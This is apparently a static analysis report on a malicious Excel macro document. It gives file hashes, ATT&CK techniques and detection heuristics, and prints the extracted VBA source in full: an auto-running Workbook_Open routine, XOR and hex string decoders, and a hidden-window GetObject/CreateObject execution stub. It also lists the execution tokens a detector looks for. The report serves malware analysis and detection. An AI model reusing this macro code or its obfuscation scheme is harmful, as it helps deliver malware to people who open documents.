Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 8975304884fa73b8…

Verdict: MALICIOUS

File type: Office (OLE) / .XLS

Size: 66.5 KB
Created: 2023-09-12 08:45:02
Authoring application: Microsoft Excel
First seen: 2023-09-14
MD5: a68941570bd6dbee2d498e23e150ea08
SHA-1: 96e4b0dd8c33b4baa5553b204aac041b79f01a8e
SHA-256: 8975304884fa73b88506ddffda56954957351310144282866cdd1f2a201f88eb
Risk score: 148

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1059 Command and Scripting Interpreter
T1203 Exploitation for Client Execution

The sample is an XLS file containing VBA macros, specifically a Workbook_Open macro that uses CreateObject and GetObject calls. The macro deobfuscates and executes a payload: the 'Minneapolis' function decodes hex-encoded cell values from sheet "f2ca" with a repeating XOR key, the hardcoded string 'q9b7d8291c', and passes the results to a GetObject(...).CreateObject(...).Run call with a hidden window. The deobfuscated content is likely a second-stage downloader.

Heuristics (5)

  • VBA macros detected (severity: medium; 4 related findings; rule OLE_VBA_MACROS)
    Document contains VBA macro code
  • CreateObject call (severity: high; rule OLE_VBA_CREATEOBJ)
    Matched line in script:
    GetObject(Florist).CreateObject(Earrings).Run HouseHolds & " " & Basics & Optimal, 0
  • GetObject call (severity: high; rule OLE_VBA_GETOBJ)
    Matched line in script:
    GetObject(Florist).CreateObject(Earrings).Run HouseHolds & " " & Basics & Optimal, 0
  • VBA p-code auto-exec with execution tokens (severity: high; rule OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro (severity: low; rule OLE_VBA_WBOPEN)
    Matched line in script:
    Sub Workbook_Open()

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                                 Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)    4367 bytes
SHA-256: a17329cfef485d802be51344045c34a6e9cbfc45a9624e99f4e805b2761fdf2f
Preview script
Extracted script (whitespace padding stripped; statements unchanged)
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit

' Analyst note: repeating-key XOR decoder. Pleased is a hex string that Quoted()
' turns into bytes; each byte is XORed with the key "q9b7d8291c" (key index is
' position Mod 10; the *2 skips the high byte of the UTF-16 string-to-Byte copy).
' Control flow is scrambled with GoTo labels to hinder reading.
Private Function Minneapolis(ByVal Pleased As String) As Variant
    Dim Transferred As Long: Transferred = 0: Dim Rocks() As Byte
    Dim Crimes() As Byte, RestoRation As String, Islam As Integer, Robot As Integer, Chapters As Integer
    Crimes = "q9b7d8291c"
    GoTo RecoRdings
Constantly:
    If Transferred < UBound(Rocks) Then
        Islam = Transferred Mod (10)
        Chapters = Crimes(Islam * 2)
        Robot = Rocks(Transferred)
        GoTo Amber
Metropolitan:
        RestoRation = RestoRation & Chr(Rocks(Transferred))
        Transferred = Transferred + 1
        GoTo Constantly
    Else
        GoTo Grounds
    End If
Grounds:
    Minneapolis = RestoRation
    Exit Function
RecoRdings:
    Rocks = Quoted(Pleased)
    GoTo Constantly
Amber:
    Rocks(Transferred) = Abs(Robot Xor Chapters)
    GoTo Metropolitan
End Function

' Analyst note: execution stub. Every argument is a decoded string; the object
' moniker, ProgID and command line are all resolved at run time, and the trailing
' 0 asks Run to use a hidden window.
Private Sub Democrats(ByVal Florist As String, ByVal Optimal As String, ByVal HouseHolds As String, ByVal Earrings As String, ByVal Basics As String)
    GetObject(Florist).CreateObject(Earrings).Run HouseHolds & " " & Basics & Optimal, 0
End Sub

' Analyst note: auto-exec entry point. The five arguments are decoded on open
' from cells of sheet "f2ca"; the payload strings never appear in the VBA source.
Sub Workbook_Open()
    Democrats Minneapolis(Sheets("f2ca").Range("H182").Value), Minneapolis(Sheets("f2ca").Range("F133").Value), Minneapolis(Sheets("f2ca").Range("J189").Value), Minneapolis(Sheets("f2ca").Range("J112").Value), Minneapolis(Sheets("f2ca").Range("J116").Value)
End Sub

' Analyst note: hex decoder. Chr(38) & Chr(72) evaluates to "&H", so each
' two-character slice becomes a hex literal that VBA coerces into the Byte array.
' The InputBox lines after GoTo MatheMatical are unreachable dead code.
Private Function Quoted(ByVal Nurses As String) As Variant
    Dim RestoRation() As Byte, i As Long, Islam As Integer, Jurisdiction As Integer
    Jurisdiction = Len(Nurses) / 2: i = 0: ReDim RestoRation(0 To Jurisdiction) As Byte
Chapters:
    If i < Len(Nurses) Then
        Islam = Islam + 1
        RestoRation(Islam - 1) = Chr((7 * 2) + (((10 - 4) * 2) * 2)) & Chr((((16 / 2) * 2) + (4 * 5)) * 2) & Mid(Nurses, i + 1, 2)
        i = i + 2
        GoTo Chapters
    Else
        GoTo MatheMatical
        Dim Amber As String
        Amber = InputBox("celp lape")
    End If
MatheMatical:
    Quoted = RestoRation
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True